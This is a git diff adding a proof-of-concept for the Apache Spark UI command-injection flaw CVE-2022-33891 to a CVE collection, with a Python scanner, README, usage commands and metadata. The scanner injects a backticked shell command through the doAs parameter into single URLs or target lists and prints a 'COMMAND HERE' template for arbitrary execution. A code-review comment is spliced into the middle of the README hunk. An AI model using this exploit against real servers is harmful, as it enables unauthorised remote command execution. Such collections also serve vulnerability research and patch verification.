diff --git a/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py b/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py
new file mode 100644
index 0000000000000000000000000000000000000000..c030eed10ea6f4043ef99820d51d973ca2af6af6
--- /dev/null
+++ b/cve/apache-Spark/2022/CVE-2022-33891/CVE-2022-33891.py
@@ -0,0 +1,75 @@ +import requests +import argparse + +def banner(): + print('''\033[0;34m + _____ _ _ _____ _____ _____ _____ _____ _____ _____ _____ _____ __ +/ __ \ | | | ___| / __ \| _ |/ __ \/ __ \ |____ ||____ | _ || _ |/ | +| / \/ | | | |__ ______`' / /'| |/' |`' / /'`' / /'______ / / / /\ V / | |_| |`| | +| | | | | | __|______| / / | /| | / / / / |______| \ \ \ \/ _ \ \____ | | | +| \__/\ \_/ / |___ ./ /___\ |_/ /./ /___./ /___ .___/ /.___/ / |_| |.___/ /_| |_ + \____/\___/\____/ \_____/ \___/ \_____/\_____/ \____/ \____/\_____/\____/ \___/ + + \033[0;34m[\033[0;37mScript coded by Amolo Hunters\033[0;34m] + ''') + +def urlexploit(url): + if arguments.valid: + try: + r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10) + if r.elapsed.total_seconds() <= 8: + print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`') + except: + print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}') + pass + else: + try: + r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10) + if r.elapsed.total_seconds() <= 8: + print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`') + else: + print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}') + except: + print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}') + pass + +def listexploit(file): + if arguments.valid: + f = open(file, 'r').read().splitlines() + for url in f: + try: + r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10) + if r.elapsed.total_seconds() <= 8: + print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`') + else: + print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}') + except: + print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}') + pass + else: + f = open(file, 'r').read().splitlines() + for url in f: + try: + r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10) + if r.elapsed.total_seconds() <= 8: + print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`') + else: + 
print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}') + except: + print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}') + pass + +def main(): + banner() + if arguments.turl: + urlexploit(arguments.turl) + if arguments.tlist: + listexploit(arguments.tlist) + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('-u','--url', action='store', help='target url', dest='turl', required=False) + parser.add_argument('-l','--list', action='store', help='targets list', dest='tlist', required=False) + parser.add_argument('-v', '--valid', action='store_true', help='only valid targets', dest='valid', required=False) + arguments = parser.parse_args() + main() diff --git a/cve/apache-Spark/2022/CVE-2022-33891/README.md b/cve/apache-Spark/2022/CVE-2022-33891/README.md new file mode 100644 index 0000000000000000000000000000000000000000..96337218e49034645f1886509eff9e9dee9e453a --- /dev/null +++ b/cve/apache-Spark/2022/CVE-2022-33891/README.md @@ -0,0 +1,37 @@ +
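Review bot: The vulnerability verdict in urlexploit and listexploit is decided by `if r.elapsed.total_seconds() <= 8:`, which is true both for a server that honoured `sleep 7` and for one that answered at once, so every reachable host is reported as vulnerable and the `--valid` mode filters nothing; a time-based check has to require that the delay actually happened, i.e. `if r.elapsed.total_seconds() >= 7:`. The bare `except:` around each request also swallows KeyboardInterrupt and discards the real failure, so `except requests.RequestException as exc:` with `exc` included in the "Error trying to explore" line would keep Ctrl-C working and make the error diagnosable. `open(file, 'r').read().splitlines()` never closes the handle (`with open(file) as fh:` fixes that), and the four near-identical request blocks (the `--valid` branch of urlexploit is byte-for-byte its else branch) would collapse into one helper taking the URL plus a flag for whether to print the negative result. Both functions read the module-global `arguments`, which is bound only under `if __name__ == '__main__':`, so importing the module and calling them raises NameError; passing the flag as a parameter removes that coupling. The hunk's indentation appears lost in rendering, so these observations are inferred from statement order.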

「💥」CVE-2022-33891

+ +

+ +## Description + +The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. + +### Vulnerable Code + +``` +private def getUnixGroups(username: String): Set[String] = { + val cmdSeq = Seq("bash", "-c", "id -Gn " + username) + // we need to get rid of the trailing "\n" from the result of command execution + Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet +} +``` + +* https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41 + +## Demo + +![demo](demo.png) + +## Usage + +``` +pip install requests +git clone https://github.com/AmoloHT/CVE-2022-33891 +cd CVE-2022-33891 +python3 CVE-2022-33891.py -u http://TARGET.TLD +``` + +## Reference + +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891 +* https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc diff --git a/cve/apache-Spark/2022/CVE-2022-33891/demo.png b/cve/apache-Spark/2022/CVE-2022-33891/demo.png new file mode 100644 index 0000000000000000000000000000000000000000..1927e5e0110690e159c75a55907c6bd404c4d696 Binary files /dev/null and b/cve/apache-Spark/2022/CVE-2022-33891/demo.png differ 
diff --git a/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml b/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7f97b3a3649b026be746d3e0c0639d09640b92df --- /dev/null +++ b/cve/apache-Spark/2022/yaml/CVE-2022-33891.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-33891 +source: https://github.com/AmoloHT/CVE-2022-33891 +info: + name: Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。 + severity: High + description: | + Apache Spark用户界面提供了通过配置选项spark.acls.enable来启用ACL的可能性。通过认证过滤器可以检查一个用户是否有查看或修改应用程序的访问权限。如果启用了ACL,HttpSecurityFilter中的代码路径允许某人通过提供任意的用户名来进行冒充。然后,一个恶意的用户可能会到达一个权限检查函数,最终根据他们的输入建立一个Unix shell命令,并执行它。这将导致以Spark当前运行的用户身份执行任意的shell命令。 + scope-of-influence: + Apache Spark 3.0.3及更早的版本,Apache Spark 3.1.1-3.1.2,Apache Spark 3.2.0-3.2.1 + reference: + - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html + - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-33891 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None + tags: execute code diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2b69f179a6e97f17564d06e258e4fe60d..d0c03f47e24224077c968cfaadfa19f74c8ce72e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -8,6 +8,8 @@ cve: - CVE-2022-24112 apache-solr: - CVE-2021-27905 + apache-Spark: + - CVE-2022-33891 linux-kernel: - CVE-2021-4204 - CVE-2021-22555